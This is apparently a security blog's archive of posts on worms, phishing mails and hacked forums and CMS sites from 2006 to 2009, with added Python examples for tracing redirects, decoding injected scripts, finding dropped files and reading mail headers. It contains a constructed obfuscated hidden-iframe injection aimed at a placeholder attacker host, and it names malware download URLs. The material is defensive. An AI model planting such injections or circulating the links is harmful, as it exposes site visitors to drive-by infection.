Archive for the ‘Parasites’ Category

MSN worm making rounds?

Sunday, April 19th, 2009

I’ve had three messages from friends on MSN the last two days that weren’t actually from them. They were all Norwegian nationals, and were unlikely to write to me in English. And they certainly were unlikely to “cold call” links to dodgy sites.

Most likely there’s a form of MSN worm making the rounds in Norway right now.

Hmmm, combination worm/phish, it appears…

I checked the latest URL with a text browser, and there was a redirect to a page with the title:
MSN anti-Block Checker is now FREE!

The page then says:
Your Contact List is Searcing now…
Please Wait!

And then an alert:
Congratulations! Your MSN Contact List is clear! Nobody has blocked you

I also found this:
Please fill MSN Account and Password fields

UPDATE:
Oh dear (as Miss Marple would say, she was just on TV).

Another link I received led to a 302 redirect and then to an exe file. I’ve got it saved on a unix server, if anyone’s interested in examining it.

The third link went to a spammy page on weightloss pills.
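As an added example (not part of the original post), here is the kind of check described above done in Python rather than in a text browser: walking a link's redirect chain one hop at a time without letting anything run, and classifying what the final hop serves by its first bytes instead of trusting the file extension or the Content-Type header. The short.example, drop.example and loop.example hosts and their responses are constructed for the demo; the `live_fetch` function at the end uses urllib and exists only for pointing the same `trace` at a real link.

```python
import urllib.error
import urllib.request
from urllib.parse import urljoin

# Magic bytes checked at every hop. A payload is rarely labelled honestly,
# so the body is classified before the Content-Type header is believed.
MAGIC = [
    (b"MZ", "DOS/Windows executable (PE)"),
    (b"\x7fELF", "ELF executable"),
    (b"PK\x03\x04", "ZIP archive"),
    (b"%PDF", "PDF"),
]


def classify(body):
    """Label a response body from its leading bytes."""
    for magic, label in MAGIC:
        if body.startswith(magic):
            return label
    head = body[:512].lstrip().lower()
    if head.startswith((b"<!doctype", b"<html")) or b"<script" in head:
        return "HTML/script"
    return "unknown"


def trace(url, fetch, max_hops=10):
    """Follow HTTP redirects by hand, recording every hop.

    fetch(url) must return (status, headers_dict_with_lowercase_keys, first_bytes).
    A redirect loop or an over-long chain stops the walk instead of spinning.
    """
    chain, seen = [], {url}
    for _ in range(max_hops):
        status, headers, body = fetch(url)
        chain.append({
            "url": url,
            "status": status,
            "content_type": headers.get("content-type", ""),
            "kind": classify(body),
        })
        if status in (301, 302, 303, 307, 308) and "location" in headers:
            nxt = urljoin(url, headers["location"])
            if nxt in seen:
                chain[-1]["note"] = "redirect loop"
                break
            seen.add(nxt)
            url = nxt
            continue
        break
    return chain


# Constructed responses (hostnames are placeholders): a short link that 302s to
# a .php URL which hands back a Windows executable while claiming to be HTML,
# plus a pair of URLs that redirect to each other.
FAKE_RESPONSES = {
    "http://short.example/x": (302, {"location": "http://drop.example/get.php?id=7"}, b""),
    "http://drop.example/get.php?id=7": (
        200, {"content-type": "text/html"}, b"MZ\x90\x00\x03\x00\x00\x00" + b"\x00" * 56),
    "http://loop.example/a": (302, {"location": "/b"}, b""),
    "http://loop.example/b": (302, {"location": "/a"}, b""),
}


def fake_fetch(url):
    return FAKE_RESPONSES[url]


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    """Make urllib surface 3xx responses instead of silently following them."""

    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


def live_fetch(url, max_bytes=1024, timeout=10):
    """Fetch one hop from the network, reading only the first bytes of the body."""
    opener = urllib.request.build_opener(_NoRedirect)
    req = urllib.request.Request(url, headers={"User-Agent": "Mozilla/5.0"})
    try:
        with opener.open(req, timeout=timeout) as resp:
            return resp.status, {k.lower(): v for k, v in resp.headers.items()}, resp.read(max_bytes)
    except urllib.error.HTTPError as err:
        return err.code, {k.lower(): v for k, v in err.headers.items()}, b""


if __name__ == "__main__":
    for hop in trace("http://short.example/x", fake_fetch):
        print(hop)
```

Run it against a real link as `trace(url, live_fetch)`; the body is read with a byte cap and never written to disk, which is what you want when the last hop turns out to be a 302 to an .exe.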

Hacked Joomla site

Thursday, February 26th, 2009

I came across a hacked site today. Turns out it was based on an older version of Joomla. That MIGHT be where the hackers got in, but not necessarily. I checked on that site a few weeks ago (there’s actually still a Google cache from back then, Jan 20, 2009), and back then I first thought something was wrong with the software, and then eventually found that the database server was down. I hadn’t been back until today.

(name of site removed) is a website belonging to a guy who writes books and articles on stalking, cyberstalking, bullying and online security. These days I don’t normally include the name of the sites that have been hacked, but this time I couldn’t resist. The security guy got hacked (OK, he says he’s not a security guy, I just thought it sounded good…). I’m sure this will be fodder for a great new article from the security guy!

He’s got lots of pages visible in Google from when the site was operational (as late as February 22, 2009). But now all those pages redirect to the root page. If you check index.html, you get a normal 404 error page, but index.php is a hacked 404 error page, that contains the hacked code.

The injected code is an escaped string fed through unescape() and eval(); decoded, it's an iframe pointing to a Russian site. I never got so far as to see what was there, because my anti-virus dislikes the code. The source of the page also complains that the template file can't be found. These hacks quite often pull in the code dynamically from a different website, so the code you see when you access the site might not be what's actually hidden in the hacked files (in other words, finding the hacked code isn't easy - better remove everything and reupload a clean copy from your computer). And the exploit itself (usually a file that will infect a visiting computer) might be on a third site.

Here’s an image containing (first part) the code I found on the page, prior to the unescaped string, and (last part) what that string decoded to.
[image: cyberstalking.co.uk]

This hack has been mentioned online as early as 2007, and again a year ago, and it's been mentioned as serving malware, but this site was recently hacked, as far as I know. According to others who had the same thing happen, the hack was done through PHP scripts uploaded by clients. I checked other domains currently on the same server, and they do not appear to be affected.

Here’s an analysis of who is behind this (Nov 2007)
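An added example (not from the original post) of how to read an injection like the one above without running it: JavaScript's unescape() only turns %XX and %uXXXX sequences back into characters, so the string inside eval(unescape("...")) can be decoded statically and searched for the iframe target. The sample page and the attacker.example hostname below are constructed; the real injection pointed at a Russian site the post does not name.

```python
import re

# JavaScript unescape(): %XX is one Latin-1 byte, %uXXXX one UTF-16 code unit;
# anything else is passed through untouched.
_ESC = re.compile(r"%u([0-9A-Fa-f]{4})|%([0-9A-Fa-f]{2})")


def js_unescape(s):
    return _ESC.sub(lambda m: chr(int(m.group(1) or m.group(2), 16)), s)


def js_escape(s):
    """Inverse of js_unescape; used here only to build the constructed sample."""
    out = []
    for c in s:
        if c.isascii() and c.isalnum():
            out.append(c)
        elif ord(c) < 256:
            out.append("%%%02X" % ord(c))
        else:
            out.append("%%u%04X" % ord(c))
    return "".join(out)


_EVAL_UNESCAPE = re.compile(
    r"""eval\s*\(\s*unescape\s*\(\s*(['"])(.*?)\1\s*\)\s*\)""", re.S)


def decode_eval_unescape(source, max_rounds=5):
    """Peel eval(unescape("...")) layers statically; returns each decoded layer.

    Nothing is executed: every layer is decoded with js_unescape and rescanned,
    so a wrapper nested inside another wrapper is unpacked too.
    """
    decoded, pending = [], [source]
    for _ in range(max_rounds):
        nxt = []
        for text in pending:
            for m in _EVAL_UNESCAPE.finditer(text):
                inner = js_unescape(m.group(2))
                decoded.append(inner)
                nxt.append(inner)
        if not nxt:
            break
        pending = nxt
    return decoded


_IFRAME_SRC = re.compile(r"""<iframe[^>]*\bsrc\s*=\s*['"]?([^'"\s>]+)""", re.I)


def iframe_targets(source):
    """Every iframe src in the page itself and in all decoded layers."""
    found = []
    for text in [source] + decode_eval_unescape(source):
        for m in _IFRAME_SRC.finditer(text):
            if m.group(1) not in found:
                found.append(m.group(1))
    return found


# Constructed sample of the injection pattern: a hidden 1x1 iframe written by
# document.write() inside an escaped eval() wrapper. Hostname is a placeholder.
PAYLOAD = ('document.write(\'<iframe src="http://attacker.example/in.php" '
           'width=1 height=1 style="display:none"></iframe>\');')
SAMPLE_PAGE = ('<html><body><h1>404 Not Found</h1>\n'
               '<script>eval(unescape("%s"))</script>\n</body></html>' % js_escape(PAYLOAD))

if __name__ == "__main__":
    for layer in decode_eval_unescape(SAMPLE_PAGE):
        print(layer)
    print(iframe_targets(SAMPLE_PAGE))
```

This only handles the unescape() family of wrappers; String.fromCharCode() chains and document.write() of further script tags need their own decoders, which is why the post's advice to wipe and reupload rather than hunt for the code is sound.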

PhpBB folder compromised

Thursday, December 27th, 2007

I received an e-mail that attempted (in Spanish) to get me to log in somewhere. The link was fake, and pointed somewhere other than where it appeared to.

It pointed to an exe file (I haven't tested the exe file) in a folder that turned out to be the docs folder of a phpBB installation, a 2.0.x version. That folder had obviously been compromised, and a lot of scripts had been placed there. The forum appears to have been installed in September 2006, but the phpBB files were last modified a year later. Some of the files have dates before that, but were probably uploaded in such a way that the original file date was preserved?

I’ve notified the site admin, so let’s see if he responds and tells us what happened. I assume this is a vulnerability that’s been fixed in newer versions of phpBB?
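On the question of preserved file dates above, an added example (not from the post): on Unix the inode change time (ctime) cannot be set by ordinary upload or touch tools, so a file whose mtime is far older than its ctime was written or moved onto the server recently with its old timestamp carried along. The Python scanner below flags files in a static folder like phpBB's docs/ by three independent signals: a script or executable extension, a ctime after the known install date, and a backdated mtime. The directory it builds in `demo()` is constructed, and the file names in it are placeholders.

```python
import os
import stat
import tempfile
import time

# Extensions that have no business in a documentation folder.
SUSPECT_EXT = {".php", ".php3", ".php4", ".phtml", ".pl", ".cgi", ".exe", ".scr"}
DAY = 86400


def scan_folder(root, installed_at, slack=DAY):
    """Return (relative path, reasons) for suspicious regular files under root.

    installed_at is the install time in epoch seconds. On Unix, st_ctime is the
    inode change time and is set by the kernel; a large ctime-minus-mtime gap
    means the mtime was preserved on upload. (On Windows st_ctime is creation
    time and that signal does not apply.)
    """
    findings = []
    for dirpath, _, names in os.walk(root):
        for name in names:
            path = os.path.join(dirpath, name)
            st = os.lstat(path)
            if not stat.S_ISREG(st.st_mode):
                continue
            reasons = []
            if os.path.splitext(name)[1].lower() in SUSPECT_EXT:
                reasons.append("script/executable in a static folder")
            if st.st_ctime > installed_at + slack:
                reasons.append("changed after installation")
            if st.st_ctime - st.st_mtime > slack:
                reasons.append("mtime older than ctime: timestamp preserved on upload")
            if reasons:
                findings.append((os.path.relpath(path, root), reasons))
    return sorted(findings)


def demo():
    """Build a constructed docs/ tree and scan it; returns the findings."""
    root = tempfile.mkdtemp(prefix="phpbb_docs_")
    now = time.time()
    installed_at = now - 400 * DAY  # forum installed over a year ago

    # Created now with a current mtime: only 'changed after installation'
    # fires, because in this demo every file is necessarily new.
    with open(os.path.join(root, "README.html"), "w") as f:
        f.write("<html>phpBB docs</html>")

    # Stand-in for a dropped script: PHP in docs/, written now, then given a
    # mtime from two years back the way a timestamp-preserving upload would.
    dropped = os.path.join(root, "dropped.php")
    with open(dropped, "w") as f:
        f.write("<?php /* constructed placeholder, not a real script */ ?>")
    old = now - 800 * DAY
    os.utime(dropped, (old, old))  # sets atime/mtime; ctime stays 'now'

    return scan_folder(root, installed_at)


if __name__ == "__main__":
    for path, reasons in demo():
        print(path, "->", "; ".join(reasons))
```

The install date is the anchor: pristine phpBB files unpacked from the release tarball will also show a ctime newer than their mtime, but that ctime is the install date, while dropped files cluster at the compromise date.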

Old Invision forums hacked again

Monday, October 1st, 2007

I’ve got an old Invision forum. The latest free version. And yes, I know, it’s a bad idea. But it’s been the only solution for having a decent featured pre-moderated forum for a while, unless you want to pay for the software.

So, it's gotten hacked a few times. And this last time it was embarrassing:

They posted AS ME!

The topic title was “please help”, and the content was one link:

blueice77.com/server.exe

I haven’t checked out the program. I’ll leave that to the security geeks. My forum wasn’t the only one that got hacked like that. They always post as one of the admins, and there’s nothing more than the link in the post.

IP used: 195.22.229.24

It's an open proxy, so that doesn't help much. And the user agent is the latest English-language Firefox version.

The website with the exe file on it appears to have been hacked. The file existed on the server when I tested it, though I don't know what it contains. Since it's been hacked, I won't post the whois here, and I'll contact the owner.

And on the topic of pre-moderation (I only checked PHP software): vBulletin and Invision have pre-moderation. But they're both commercial software (except for the old version of Invision, which has more security holes than a sieve), so not an option for all. Simple Machines and phpBB have promised pre-moderation in the next major version. phpBB has a release candidate with pre-moderation currently available. miniBB has pre-moderation currently, but the new posts will show - you just can't see the content until approved.

Spreading malware by mail spam

Tuesday, July 10th, 2007

I just got this e-mail, twice to the same address:

Dear Customer,

Our robot has detected an abnormal activity from your IP adress
on sending e-mails. Probably it is connected with the last epidemic
of a worm which does not have official patches at the moment.

We recommend you to install this patch to remove worm files
and stop email sending, otherwise your account will be blocked.

Customer Support Robot

Under the text "this patch" there's a link to an IP address with some encrypted-looking URL, a different IP address in each mail. Both of them already give a socket error, so I can't check what they contained.

Shaking head… There's a discussion on "alt.madcrew" about this, with some people who appear to have taken the e-mail at face value. One of them writes:

installed the patch too but now my computer has become very slow and
even when I am not doing anything on my computer my hard drive makes a
lot of noise as if there is a lot of activity, I don’t understand :-(

Beware of hacked sites

Saturday, June 30th, 2007

Someone e-mailed me an example of a hacked site (the hack is currently offline, with the hacked version set up on a hidden page for me to check).

Update: Lots of homepages affected. Check this google search.

It was the homepage of the company that was hacked, with a couple of links added at the bottom. In addition to those two visible links, there are some hidden links that are identical to the links you'll find if you follow the .txt links. The links are only visible if you check the source code, so I believe the txt files are meant as includes in the hacked php file.

The first link is: buybeer4me.info/scr/18.txt

It’s got some obfuscated javascript that actually points to the second link:

bestrezult.com/scr/1.txt

The links in that document point to another hacked site:

dinuba.ca.gov/minutes/agendas/.~ss/

When I loaded one of the pages referenced in the spam, I got this. Keep in mind that I had images disabled, so the page might look somewhat …different in reality:

[image: nmextensions]
It’s obviously malicious, and I found a post referring to the site it’s loaded from:

mvsps

Winfixer more aggressive?

Thursday, May 31st, 2007

I went by a website today that had a rather nasty payload. After a search on the site that delivered a search result, the page disappeared and a page from amaena.com loaded instead. I'm always very careful when those appear. I close the windows that pop up (I use Firefox with pop-up protection) with Alt-F4. Even so, the Winfixer exe file started downloading and was caught by my anti-virus.

The ad was delivered by ad2profit.com

I’ve never in the past experienced a forced download of Winfixer, so I’m wondering what’s up?

Danish fedex spam with virus

Thursday, April 19th, 2007

During the night thousands of e-mail addresses connected with people in Denmark have received an e-mail purportedly from fedex.com. It’s written in what appears to me to be perfect Danish, and promises 15 % off if they send in the form attached to the mail. Only the “form” is not a form. It’s an executable with a random numeric name, and containing the virus TR/Spy.Bzub.B.

Some journalists in Denmark originally thought hackers had gotten into fedex and sent out those e-mails. But the e-mails were sent out to random Danish addresses, including inactive ones - both customers and non-customers of Fedex. And I got a sample of the headers, and will paste them in here (the relevant bits). Notice that it doesn’t even come from Denmark:

Received: from 66-195-105-206.static.twtelecom.net [66.195.105.206] by recipientsmailserver2.dk with ESMTP
(SMTPD-8.22) id AA310348; Wed, 18 Apr 2007 22:06:09 +0200
Return-Path:
Received: from 209.205.25.170 (HELO smtp.albert-white.com)
by recipientsmailserver.dk with esmtp (/-26A4FH5 LU6Z)
id 4ESG>0-/FYYK7-OR
for recipient@recipientsmailserver.dk; Wed, 18 Apr 2007 20:06:27 +0600
Message-ID: <01c781f5$0c516520$6c822ecf@gblk>
From: "FedEx"
To:
Subject: Kvittering
Date: Wed, 18 Apr 2007 20:06:27 +0600
MIME-Version: 1.0
Content-Type: multipart/mixed;
boundary="----=_NextPart_000_0007_01C781CB.237B5D20"
X-Priority: 3
X-MSMail-Priority: Normal

Notice how it's got two Received lines? The MX record for the e-mail address points to recipientsmailserver.dk, while there's another mail server at the same IP number named recipientsmailserver2.dk (all recipient info munged). So I'm slightly unsure where that mail really came from… The twtelecom address is blocklisted at psbl.surriel.com for another spam run on April 5.
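An added example (not from the post) of reading a Received chain like the one above with a script instead of by eye. Only the topmost Received line, written by your own server, can be trusted; everything below it was supplied by the sender and may be forged, so the parser keeps the hops in order and reports the connecting IP, HELO name and timestamp of each, the delay between hops, and the query name you would resolve against psbl.surriel.com. The sample headers are the munged ones quoted above (recipient hosts are the post's placeholders); `dnsbl_listed` is the only function that touches the network and is not called by default.

```python
import re
import socket
from email.utils import parsedate_to_datetime

# Constructed from the munged headers quoted above; only the lines the parser
# needs are kept, folding preserved as it was.
SAMPLE_HEADERS = """\
Received: from 66-195-105-206.static.twtelecom.net [66.195.105.206] by recipientsmailserver2.dk with ESMTP
  (SMTPD-8.22) id AA310348; Wed, 18 Apr 2007 22:06:09 +0200
Return-Path:
Received: from 209.205.25.170 (HELO smtp.albert-white.com)
  by recipientsmailserver.dk with esmtp (/-26A4FH5 LU6Z)
  id 4ESG>0-/FYYK7-OR
  for recipient@recipientsmailserver.dk; Wed, 18 Apr 2007 20:06:27 +0600
From: "FedEx"
Subject: Kvittering
Date: Wed, 18 Apr 2007 20:06:27 +0600
"""

IPV4 = r"\d{1,3}(?:\.\d{1,3}){3}"


def unfold(raw):
    """Join folded header lines (continuations start with whitespace)."""
    lines = []
    for line in raw.splitlines():
        if line[:1] in (" ", "\t") and lines:
            lines[-1] += " " + line.strip()
        else:
            lines.append(line.rstrip())
    return lines


def parse_received(raw):
    """One dict per Received: header, top of message first (i.e. last hop first)."""
    hops = []
    for line in unfold(raw):
        if not line.lower().startswith("received:"):
            continue
        body = line.split(":", 1)[1].strip()
        clause, date = body.rsplit(";", 1) if ";" in body else (body, "")
        m_from = re.search(r"\bfrom\s+(\S+)", clause)
        m_ip = (re.search(r"\[(%s)\]" % IPV4, clause)
                or re.search(r"\bfrom\s+(%s)\b" % IPV4, clause))
        m_helo = re.search(r"\(HELO\s+([^\s)]+)\)", clause, re.I)
        m_by = re.search(r"\bby\s+(\S+)", clause)
        hops.append({
            "from": m_from.group(1) if m_from else None,
            "ip": m_ip.group(1) if m_ip else None,
            "helo": m_helo.group(1) if m_helo else None,
            "by": m_by.group(1) if m_by else None,
            "time": parsedate_to_datetime(date.strip()) if date.strip() else None,
        })
    return hops


def hop_delays(hops):
    """Seconds between consecutive hops, earliest pair first; negative means clocks disagree."""
    delays = []
    for later, earlier in zip(hops, hops[1:]):
        if later["time"] and earlier["time"]:
            delays.append(int((later["time"] - earlier["time"]).total_seconds()))
    return list(reversed(delays))


def dnsbl_name(ip, zone="psbl.surriel.com"):
    """DNS blocklist query name: octets reversed, then the zone."""
    return ".".join(reversed(ip.split("."))) + "." + zone


def dnsbl_listed(ip, zone="psbl.surriel.com"):
    """Live lookup (network): listed if the zone answers with an A record."""
    try:
        socket.gethostbyname(dnsbl_name(ip, zone))
        return True
    except socket.gaierror:
        return False


def summarize(raw):
    hops = parse_received(raw)
    origin = hops[-1] if hops else {}
    return {
        "origin_ip": origin.get("ip"),
        "origin_helo": origin.get("helo"),
        "path": [(h["ip"], h["by"]) for h in reversed(hops)],  # first hop first
        "delays_s": hop_delays(hops),
        "dnsbl_queries": [dnsbl_name(h["ip"]) for h in hops if h["ip"]],
    }


if __name__ == "__main__":
    for key, value in summarize(SAMPLE_HEADERS).items():
        print(key, value)
```

On these headers the two hops are almost six hours apart by their own clocks, and the lower one carries a +0600 zone on a mail aimed at Danish recipients; that gap is exactly the sort of thing worth a second look before believing the lower Received line at all.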

Here’s the text of the e-mail:

[Translated from the Danish:]

Dear customer,

A package has arrived addressed to your name and address.

You will find a receipt of delivery attached to this letter.

Please open the letter and fill in the receipt to collect the package at the nearest FedEx office.

You can find the address of the nearest FedEx office at fedex.com.

Prepare a shipment online with FedEx and save time that you can use for something else. You can get information on prices, order pickup and packaging, monitor all your shipments by tracking them from home, etc., at fedex.com.

If you register now, you get a 15% discount on FedEx Express services online for 4 months from the registration date.

Yours faithfully,

Customer Service

FedEx

Update:

Danish Computerworld has an article today about the speculation that a Baltic group is behind the mail, which they call a phishing mail. According to Peter Kruse at CSIS, the virus is designed to spread over instant messengers and web-based mail services. It supposedly uses templates (if I translated the Danish word skabeloner right), so I suppose that means it actually sends out messages in people's names. There was a phishing attempt earlier regarding Tele2, and they feel the method is fairly similar (the use of templates). The command center that the virus phones home to is in Russia, and Danish internet providers have blocked access to it, in order to protect Danish surfers.

First cybercrime conviction in Russia?

Thursday, October 5th, 2006

Three Russians were sentenced to 8 years of hard time for extortion in connection with denial of service attacks.

Anna from Kaspersky told me in June that there was a Russian law that could be used against cybercrime, but that it hadn’t been used so far. That mirrors what they said in their blog yesterday. This is a very important sentence, even if the sentencing reflected the extortion more than the cybercrime.

Other news reports:

Informationweek, Securityfocus

VML patch out

Friday, September 22nd, 2006

There's a new vulnerability in Windows that Microsoft isn't going to patch until October 10. In the meantime, Webattacker is pushing out exploits for it.

The vulnerability is in Internet Explorer. If you're using Firefox, you're safe from that particular vulnerability.

But how many of us have friends, co-workers and family who insist on using Internet Explorer, because it's familiar?

ZERT has released a patch for the vulnerability, according to Eweek. It also mentions that Gadi Evron, bothunter extraordinaire, is operations manager for ZERT.